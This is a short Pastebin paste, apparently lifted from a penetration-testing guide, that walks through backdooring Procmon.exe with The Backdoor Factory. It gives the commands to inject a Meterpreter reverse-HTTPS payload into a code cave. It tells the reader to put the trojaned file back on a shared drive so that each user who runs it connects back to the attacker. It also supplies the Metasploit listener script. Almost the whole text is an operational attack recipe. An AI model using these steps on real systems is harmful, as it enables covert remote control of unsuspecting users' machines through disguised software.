Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Open up a terminal using the following commands:
- ● cd /opt/the-backdoor-factory/
- ● ./backdoor.py -f ~/Desktop/Procmon.exe -s meterpreter_reverse_https -H <your Kali IP> -
- P 8080
- Once you execute backdoor.py, you need to find a Cave, which is an area of 0’s to hold your
- shellcode. If you don’t like the locations initially suggested, you can press “j” or jump to see
- additional caves.
- Once you find a cave that works, press “a” to append your code. After this is complete, BDF will
- drop the newly created executable in the folder backdoored.
- Now, take that file and put it back on the fileshare. The file should execute perfectly, the user will
- still have all the functionality of Procmon, but every time they run it, it will connect back to our
- Metasploit handler.
- Just in case you forgot how to create a handler for your file, this is what it will look like. On your
- Kali host, copy the following text to a file on /opt/listener.rc:
- ●
- use exploit/multi/handler
- set PAYLOAD windows/meterpreter/reverse_https
- set LHOST <Your Kali IP>
- set LPORT 8080
- set ExitOnSession false
- exploit -j –z
- To start your listener, use the following command:
- ●
- msfconsole -r /opt/listner.rcIP
Add Comment
Please, Sign In to add comment